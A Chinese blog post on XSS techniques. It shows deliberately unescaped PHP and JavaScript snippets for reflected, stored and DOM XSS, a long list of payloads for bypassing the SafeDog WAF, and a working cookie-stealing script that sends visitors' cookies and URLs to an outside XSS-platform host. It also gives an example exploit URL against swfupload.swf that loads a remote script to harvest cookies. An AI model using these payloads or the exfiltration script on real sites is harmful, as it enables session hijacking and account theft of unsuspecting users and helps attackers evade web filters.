xss-学习姿势

最新推荐文章于 2024-02-16 10:30:00 发布
最新推荐文章于 2024-02-16 10:30:00 发布
阅读量368 收藏
点赞数 1
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46942417/article/details/107926818
版权

xss也叫跨站脚本攻击,原因在于网站的前端因为对输入或者输出不严谨从而可以在网站插入脚本代码造成xss攻击。

<The rest of contents | 余下全文>

xss形成分类

主要是分为反射型和存储型还有dom型

  1. 反射型
    这里的提交参数没有进行过滤转义,导致输出处可直接执行脚本代码
<form action = "htmlzr." method = "get">
name:<input type = "text" name = "htmlname">
<input type = "submit" value = "提交">
</form>
<?
if(@$_GET['htmlname']){
	echo $_GET['htmlname'];
}
?>
  1. 存储型
    这里的提交参数是存储在数据库里面的,也没有进行过滤或转义,导致数据库查询返回输出提交参数时可执行脚本代码
<?
//这是插入的
$conn = mysqli_connect('localhost','root','root','test');
if (mysqli_connect_errno($conn)){
	echo "连接 MySQL 失败: " . mysqli_connect_error(); 
}
if(@$_POST['name1']){
	$name = $_POST['name1'];
	$sql = "INSERT INTO user (name) VALUES ('{$name}')";
	if (mysqli_query($conn, $sql)) {
    echo "添加成功";
	} else {
    echo "Error: " . $sql . "<br>" . mysqli_error($conn);
}
}
?>

<?
//这是输出的
$conn = mysqli_connect('localhost','root','root','test');
if(! $conn )
{
    die('连接失败: ' . mysqli_error($conn));
}
mysqli_query($conn , "set names utf8");
$sql = 'select * from user where uid=3;';

if (mysqli_query($conn, $sql)) {
	$row = mysqli_fetch_array(mysqli_query($conn, $sql),MYSQLI_ASSOC);
	echo $row['name'];
	} else {
    echo "Error: " . $sql . "<br>" . mysqli_error($conn);
}
?>
  1. dom型
    我还是喜欢把他归类为反射型xss,这里的document.write的可执行脚本代码,//write() 方法可向文档写入 HTML 表达式或 JavaScript 代码。
<script>
var a  = document.URL;
document.write(decodeURI(a.substring(document.URL.ndexOf("content=") + 4)));
</script>

xss bypass safedog

过狗方法总结

XSS过滤绕过速查表

利用JavaScript全局变量绕过XSS过滤器

无需括号和分号的XSS

部分过狗payloads(来自ChaBug)

<a onclick="javascript:alert(0)">a
<javascript onclick="javascript:alert(0)">a
<b onclick="javascript:alert(0)">a
<abbr onclick="javascript:alert(0)">a
<acronym onclick="javascript:alert(0)">a
<address onclick="javascript:alert(0)">a
<applet onclick="javascript:alert(0)">a
<article onclick="javascript:alert(0)">a
<xss onclick="javascript:alert(0)">a
<aside onclick="javascript:alert(0)">a
<bdi onclick="javascript:alert(0)">a
<bdo onclick="javascript:alert(0)">a
<big onclick="javascript:alert(0)">a
<button onclick="javascript:alert(0)">a
<del onclick="javascript:alert(0)">a
<details onclick="javascript:alert(0)">a
<div onclick="javascript:alert(0)">a
<dfn onclick="javascript:alert(0)">a
<dl onclick="javascript:alert(0)">a
<dt onclick="javascript:alert(0)">a
<h1 onclick="javascript:alert(0)">a
<h2 onclick="javascript:alert(0)">a
<h3 onclick="javascript:alert(0)">a
<h4 onclick="javascript:alert(0)">a
<h5 onclick="javascript:alert(0)">a
<h6 onclick="javascript:alert(0)">a
<header onclick="javascript:alert(0)">a
<hr onclick="javascript:alert(0)">a
<html onclick="javascript:alert(0)">a
<kbd onclick="javascript:alert(0)">a
<map onclick="javascript:alert(0)">a
<mark onclick="javascript:alert(0)">a
<menu onclick="javascript:alert(0)">a
<menuitem onclick="javascript:alert(0)">a
<meter onclick="javascript:alert(0)">a
<q onclick="javascript:alert(0)">a
<var onclick="javascript:alert(0)">a
<xmp onclick="javascript:alert(0)">a
<addons onclick="javascript:alert(0)">a
<ascii onclick="javascript:alert(0)">a
<aspx onclick="javascript:alert(0)">a
<java onclick="javascript:alert(0)">a
<mobile onclick="javascript:alert(0)">a
<go onclick="javascript:alert(0)">a
<alibaba onclick="javascript:alert(0)">a
<baidu onclick="javascript:alert(0)">a
<google onclick="javascript:alert(0)">a
<github onclick="javascript:alert(0)">a
<acu onclick="javascript:alert(0)">a
<mail onclick="javascript:alert(0)">a
<a onmouseover="javascript:alert(0)">a
<javascript onmouseover="javascript:alert(0)">a
<b onmouseover="javascript:alert(0)">a
<abbr onmouseover="javascript:alert(0)">a
<acronym onmouseover="javascript:alert(0)">a
<address onmouseover="javascript:alert(0)">a
<applet onmouseover="javascript:alert(0)">a
<article onmouseover="javascript:alert(0)">a
<xss onmouseover="javascript:alert(0)">a
<aside onmouseover="javascript:alert(0)">a
<bdi onmouseover="javascript:alert(0)">a
<bdo onmouseover="javascript:alert(0)">a
<big onmouseover="javascript:alert(0)">a
<button onmouseover="javascript:alert(0)">a
<del onmouseover="javascript:alert(0)">a
<details onmouseover="javascript:alert(0)">a
<div onmouseover="javascript:alert(0)">a
<dfn onmouseover="javascript:alert(0)">a
<dl onmouseover="javascript:alert(0)">a
<dt onmouseover="javascript:alert(0)">a
<h1 onmouseover="javascript:alert(0)">a
<h2 onmouseover="javascript:alert(0)">a
<h3 onmouseover="javascript:alert(0)">a
<h4 onmouseover="javascript:alert(0)">a
<h5 onmouseover="javascript:alert(0)">a
<h6 onmouseover="javascript:alert(0)">a
<header onmouseover="javascript:alert(0)">a
<hr onmouseover="javascript:alert(0)">a
<html onmouseover="javascript:alert(0)">a
<kbd onmouseover="javascript:alert(0)">a
<map onmouseover="javascript:alert(0)">a
<mark onmouseover="javascript:alert(0)">a
<menu onmouseover="javascript:alert(0)">a
<menuitem onmouseover="javascript:alert(0)">a
<meter onmouseover="javascript:alert(0)">a
<q onmouseover="javascript:alert(0)">a
<var onmouseover="javascript:alert(0)">a
<xmp onmouseover="javascript:alert(0)">a
<addons onmouseover="javascript:alert(0)">a
<ascii onmouseover="javascript:alert(0)">a
<aspx onmouseover="javascript:alert(0)">a
<java onmouseover="javascript:alert(0)">a
<mobile onmouseover="javascript:alert(0)">a
<go onmouseover="javascript:alert(0)">a
<alibaba onmouseover="javascript:alert(0)">a
<baidu onmouseover="javascript:alert(0)">a
<google onmouseover="javascript:alert(0)">a
<github onmouseover="javascript:alert(0)">a
<acu onmouseover="javascript:alert(0)">a
<mail onmouseover="javascript:alert(0)">a

xss利用

xss的主要是盗取用户的cookie,修改网页的内容或者重定向到其他危险的网站,脚本代码一般也不用自己来编写一般有xss平台提供代码直接拿来用就ok

  1. 盗取cookie(xss平台的)
    一般cookie都是有时间的,过了时间就没用这个问题只需要在xss平台把keepsession勾上就OK了
function(){(new Image()).src='https://xsspt.com/index.?do=api&id=4IobBm&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='https://xsspt.com/index.?do=keepsession&id=4IobBm&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

现在是例子

www.xxxxx.com/statics/js/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;document.body.appendChild(document.createElement('script')).src='https://xsshs.cn/1Uzk'}}//

现在我们分析一下这段代码
向swfupload.swf的movieName传值,这里在catch嵌套了一个if如果window.x为假则执行下面这段代码document.createElement(‘script’)).src=’https://xsshs.cn/1Uzk
document.createElement在dom中创建元素节点script并代入script的src访问执行xss的网站
当有用户点击时,则会被记录cookie
在这里插入图片描述

IMXRT型Planck
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
XSS前端简单防范
我的博客
05-21 171
Xss 前端简单防范 function encode(html){ //1.首先动态创建一个容器标签元素,如DIV var temp = document.createElement ("div"); //2.然后将要转换的字符串设置为这个元素的innerText(ie支持)或者textContent(火狐,google支持) (temp.textContent != undefined ) ? (temp.textContent = html) : (temp.inne
JavaScript学习笔记28
学习记录
05-02 303
一、json JSON是一种传输数据的格式(以对象为样板,本质上就是对象,但用途有区别,对象就是本地用的,json是用来传输的) JSON.parse(); string---->json JSON.stringify(); json---->string 例:json的属性名必须加双引号(传的是二进制文本) ...
Java中的10种方法防止XSS攻击
qq_28245087的博客
06-29 9377
这些方法包括输入验证和过滤、安全的HTML和URL编码、Content Security Policy(CSP)的使用、安全的模板引擎和富文本编辑器、用户输入的验证和限制、安全的Cookie设置以及防止跨站点请求伪造(CSRF)。通过实施这些方法,可以降低XSS攻击的风险,保护应用程序和用户的数据安全。通过使用安全的Cookie设置,您可以增加Web应用程序的安全性,保护用户的身份验证和敏感信息免受攻击和滥用。通过验证和限制用户输入,您可以增加应用程序的安全性和可靠性,防止潜在的安全漏洞和错误数据的影响。
Java防止XSS攻击
u010786200的博客
12-24 5911
方法一:转义存储:添加XssFilter 1.在web.xml添加过滤器: <!-- 解决xss漏洞 --> <filter> <filter-name>xssFilter</filter-name> <filter-class>XXXXXX.XssFilter</filter-class> </filter> <!-- 解决xss漏洞 --> ..
XSS攻击以及java应对措施
qq_43456605的博客
05-18 4987
随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行 “查漏补缺”。XSS 全称 Cross Site Scripting,跨站脚本攻击。
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-vuln学习通关总结
08-24
个人总结类文档。
xss-lab全通关教程
05-07
xss-lab全通关教程,共有20个关,全部就压缩到文件里,另外购买还有可以私信博主,赠送xss环境
xss平台模块代码分析--默认模块
Ewige的博客
07-02 1438
这里写目录标题攻击实列代码分析 攻击实列 1. 首先创建一个模块 首次分析,就只选用一个模块,点击下方下一步后。 项目已经创建完毕,下方也有详细的使用教程。 2.先进行使用看下效果。 就使用第一个payload,很明显该payload是访问**//xsshs.cn/F6uJ**这个网址, //xsshs.cn/F6uJ此方式书写会自动根据网站选择http,还是https 我们打开这个网址,发现就是上方的代码 因此,我们的目标就是,让目标网页访问我们的链接, 靶场测试 代码分析 ...
web安全:XSS测试平台使用教程
平平无奇
08-12 2万+
我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 一、注册用户并登录 二、创建项目 1.创建项目,创建完后会生成一个xss可用脚本地址 项目名...
【Java代码审计】XSS篇
大河之犬的博客
12-16 6404
XSS 漏洞是指攻击者在网页中嵌入客户端脚本(通常是 JavaScript 编写的恶意代码),进而执行其植入代码的漏洞。若 Web 应用未对用户可直接或间接控制的“输入”与“输出”参数进行关键字过滤或转义处理,则很可能存在跨站脚本漏洞。
Java解决XSS攻击方式
weixin_44858201的博客
03-30 1万+
前言 在项目验收阶段,通常会对待验收项目做一些安全漏洞的测试,比如接口攻击,并发测试,XSS注入,SQL恶意注入测试,安全越权等操作,这时,就是考验项目的安全方面是否做的足够健壮的时候,本篇对XSS脚本攻击在实际WEB项目中的处理办法,提供2种可实行的方法 XSS攻击 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 F
java实战:Java处理XSS漏洞的四种方法及代码示例
最新发布
oandy0的博客
02-16 4994
本文将介绍几种在Java中处理XSS(跨站脚本)漏洞的常用方法,并提供详细的代码示例。我们将探讨使用HTML实体编码、使用内容安全策略(CSP)、使用框架内置的XSS防护和自定义过滤器等方法。通过本文,可以了解到如何在Java应用程序中实施有效的安全措施,以防范XSS攻击。
前端XSS攻击的三种方式
甘焕的博客
11-25 5221
针对HTML的script标签特性,对前端页面可以采取如下3中脚本注入方式。1. 添加script元素在页面中直接创建script元素,然后利用textContent特性进行脚本执行,如下: var script = document.createElement('script'); script.textContent='alert(100)'; // 立刻就会在页面进行执
javascript createelement_看我如何利用JavaScript全局变量绕过XSS过滤器
weixin_39731107的博客
11-29 116
译文声明:本文是翻译文章,文章原作者secjuice,文章来源:secjuice.com原文地址:https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/译文仅供参考,具体内容表达以及含义原文为准◆◆◆ ◆◆写在前面的话如果你发现你的攻击目标存在XSS漏洞,但是你所有的漏洞利用尝...
关于DOM型XSS漏洞的学习笔记
热门推荐
Mi1k7ea
03-05 4万+
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个
DOM的createElement的坑
肉嘟嘟的博客
03-05 1928
&lt;body&gt; &lt;div&gt; &lt;p id="p1"&gt;p1&lt;/p&gt; &lt;p id="p2"&gt;p2&lt;/p&gt; &lt;p id="p3"&gt;p3&lt;/p&gt; &lt;/div&am
xss-labs安装
07-28
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值